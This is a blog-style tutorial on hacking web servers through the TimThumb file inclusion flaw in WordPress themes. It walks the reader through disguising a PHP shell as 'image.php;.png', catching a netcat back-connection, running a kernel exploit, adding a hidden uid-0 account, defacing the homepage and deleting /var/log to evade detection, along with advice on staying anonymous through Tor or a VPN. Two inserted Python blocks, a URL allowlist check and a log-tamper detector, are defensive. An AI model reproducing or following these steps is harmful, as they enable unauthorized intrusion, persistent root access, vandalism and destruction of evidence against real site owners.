How Servers Are Hacked? Get Aware and Restrict Hackers!
[Shell Uploading, Rooting, Defacing, Covering your Tracks]
Web hacking is a huge topic that I could easily discuss for hours.
When I had the idea to expand our blog's topics (not only Apple, iPhone, iPad and little tips on Mac and Windows) and add more hacking information and tutorials, I decided to make a good start with this post-tutorial: How to Hack a Server.
Everything you need to know....
Tools you need:
- A hacker's OS (BackTrack, Linux based).
- Firefox
- Netcat (included in BackTrack). If you are on another Linux environment, get it from
- iCon2PHP
- A good server security analyzer
- A good VPN or Tor.
- A web vulnerability scanner
Starting the Main Tutorial:
So, here is the route we will follow:
Find a vulnerable website -> Upload a scripted tool -> Root the server -> Deface the website -> Cover your tracks
--- Before we begin ---
- Boot into the OS.
- Connect to your VPN or to Tor.
- It would be good to read a complete guide on staying anonymous while hacking.
- Open Firefox.
1. Finding a Vulnerable Website and Information about It:
Open and scan the website (use the standard profile; don't modify anything unless you know what you are doing). For this tutorial our website will be: www.xyzz.com (not very innovative, I know....)
Let's say we find a vulnerability where we can upload a remote file and get access to the website's files.
The warning should look something like this. It can mention other information or be a completely different warning (it depends on the vulnerability). What we need for this tutorial is a 'File Inclusion' vulnerability that gives us access to the website's files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now we have the site and the path where the vulnerability is. In our example let's say it is here:
www.xyzz.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven't updated to the latest version of TimThumb, an image-resizing PHP script used by many themes.
OK. The scanner should also mention the OS of the server. Let's assume ours is a Unix/Linux system (so I can show you how to root it).
2. Uploading the Scripted Tool:
So far, we know:
- The website's blog has a huge vulnerability in TimThumb.
- It is hosted on a Unix system.
Next, because the vulnerability is in an outdated TimThumb version, and TimThumb is a script that resizes images, we need to upload the shell in place of an image.
So, download any image (I would recommend a small one) from Google Images. We don't care what it shows.
Generate output with iCon2PHP:
Copy your image and your shell to the folder where iCon2PHP is located.
Run the program and follow the in-program instructions to build 'finalImage.php'.
To avoid errors while uploading, rename 'finalImage.php' to 'image.php;.png' (instead of png, type the format your image was: jpeg, jpg, gif....). This is exactly the same file, but it confuses the uploader into thinking it is actually an image.
iCon2PHP terminal output:
[...]
Enter the Path of your Image: image.png
Please enter the path to the PHP: GnYshell.php
Entered!
Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
[...]
Upload the output to a server:
Next, upload your 'image.php;.png' to a free host (000webhost, 0fees etc....).
Go to the vulnerable path and type this in the URL bar:
www.xyzz.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like "flickr.com" (or another big image-hosting service) because sometimes the script doesn't accept images from other websites.
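The look-alike subdomain above gets through when the script's host allowlist is applied as a plain substring test on the URL. The following is an added example (it is not part of the original post and not TimThumb's code) that contrasts that weak test with one that parses the URL, matches the hostname on label boundaries, and rejects file names that smuggle a script extension such as image.php;.png. The allowed-host list is a constructed sample.

```python
import re
from urllib.parse import urlsplit

# Hosts an image-resizing script is willing to fetch from (constructed sample).
ALLOWED_HOSTS = ("flickr.com", "picasa.com", "img.youtube.com")
# Extensions the web server would hand to a script engine.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def weak_host_check(src):
    """The bypassable test: accept any URL that merely contains an allowed
    name somewhere, so 'flickr.com.domain.0fees.net' passes."""
    return any(name in src for name in ALLOWED_HOSTS)


def strict_host_check(src):
    """Parse the URL and compare the hostname itself; accept only an exact
    match or a real subdomain (the leading dot enforces a label boundary)."""
    parts = urlsplit(src)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower().rstrip(".")
    return any(host == name or host.endswith("." + name) for name in ALLOWED_HOSTS)


def has_script_extension(src):
    """True if any dot- or semicolon-separated piece of the file name is a
    script extension, so 'image.php;.png' is caught despite ending in .png."""
    filename = urlsplit(src).path.rsplit("/", 1)[-1].lower()
    return any(piece in SCRIPT_EXTS for piece in re.split(r"[.;]", filename))


def accept_remote_src(src):
    """The combined decision a hardened fetcher makes before downloading."""
    return strict_host_check(src) and not has_script_extension(src)
```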
OK. Your website is shelled. This means that you should now have your shell uploaded and be ready to root the server.
You could easily deface the website now, but it would be better to root the server first, so that you can cover your tracks quickly.
3. Root the Server:
Now that you have shelled the website, we can start the process of rooting the server.
What is rooting when it comes to server hacking?
--> Rooting a server is the procedure by which the hacker acquires root privileges on the whole server. If you don't understand this yet, I reassure you that by the end of the section "Rooting a server" you will have understood exactly what it is...
Let's proceed to rooting....
Connect via netcat:
1. Open a port on your router. For this tutorial I will be using 402. (Search Google for how to port forward. It is easier than it seems....)
2. Open a terminal.
3. Type:
netcat -l -n -v -p 402
4. It should give an output like this:
listening on [any] 402 port
5. Now go to the back-connection function of the shell.
6. Fill in the following:
Host: YourIPAddress Port: 402 (or the port you forwarded....)
7. Hit connect and... voilà! Connected to the server!
Downloading and executing the kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet...
2. To become root we have to download a kernel exploit. The kernel version is shown in your shell. Find kernel exploits
3. Download it to your HDD and then upload it to the server via the shell. Unzip it first, if zipped....
4. Now do the following exploit preparations:
- The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you first have to compile it by typing: gcc exploit.c -o exploit ))
- Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to verify:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!
4. Deface the Website:
What is defacing?
Defacing is the procedure by which the hacker uploads his own index webpage to replace the homepage of a site. In this way, he can boost his reputation or pass a message to the people or the company that owns the website.
Since you have the website shelled, you just create a nice hacky page in HTML and upload it via the shell as index.html (delete or rename the website's own one...).
5. Cover Your Tracks:
Until now you were under the anonymity of Tor or ProXPN. You were very safe. However, to make sure it is impossible for the admin to locate you, we have to delete the logs.
First of all, Unix-based machines have some logs that you had better either edit or delete.
Common Linux log file names and their usage:
/var/log/messages: General messages and system-related stuff
/var/log/auth.log: Authentication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron jobs)
/var/log/maillog: Mail server logs
/var/log/qmail/: Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log: System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp: Login records file
/var/log/yum.log: Yum log files
In short, /var/log is the location where you should find all Linux log files.
To delete all of them at once, type:
su root1
rm -rf /var/log
mkdir /var/log
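The rm -rf /var/log; mkdir /var/log sequence only works against logs that live solely on the compromised host. As an added defender-side example (not part of the original post), the code below takes an inode-and-size snapshot of a log directory, which should be stored off-host, and compares it against a later snapshot to report files that vanished or shrank; demo() reproduces the wipe in a scratch directory rather than the real /var/log, and its file names and contents are constructed.

```python
import os
import shutil
import tempfile


def snapshot(log_dir):
    """Record (inode, size) of every entry in log_dir. Keep the result off the
    host; a copy on the same box can be wiped along with the logs."""
    files = {}
    for name in os.listdir(log_dir):
        st = os.lstat(os.path.join(log_dir, name))
        files[name] = (st.st_ino, st.st_size)
    return files


def compare(baseline, current):
    """Report files that vanished and files that shrank or were replaced
    (inode changed). Inode numbers can be reused by the filesystem, so a
    matching inode is not proof the file is untouched; a shrinking size is."""
    removed = sorted(set(baseline) - set(current))
    tampered = sorted(name for name, (ino, size) in baseline.items()
                      if name in current
                      and (current[name][0] != ino or current[name][1] < size))
    return {"removed": removed, "tampered": tampered}


def demo():
    """Reproduce 'rm -rf /var/log; mkdir /var/log' in a scratch directory
    (constructed, not the real /var/log) and return what compare() sees."""
    root = tempfile.mkdtemp()
    log_dir = os.path.join(root, "log")
    os.mkdir(log_dir)
    for name, content in (("auth.log", "sshd: Accepted password\n"),
                          ("wtmp", "x" * 16)):
        with open(os.path.join(log_dir, name), "w") as f:
            f.write(content)
    baseline = snapshot(log_dir)
    shutil.rmtree(log_dir)   # rm -rf /var/log
    os.mkdir(log_dir)        # mkdir /var/log
    report = compare(baseline, snapshot(log_dir))
    shutil.rmtree(root)
    return report


if __name__ == "__main__":
    print(demo())
```

Forwarding logs to a separate syslog collector as they are written gives the same protection without a baseline, since the attacker's deletion then happens after the copy has already left the host.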
End of this Tutorial.